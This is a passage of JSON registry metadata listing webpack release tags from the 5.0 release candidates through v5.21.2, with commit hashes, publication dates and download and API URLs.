.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_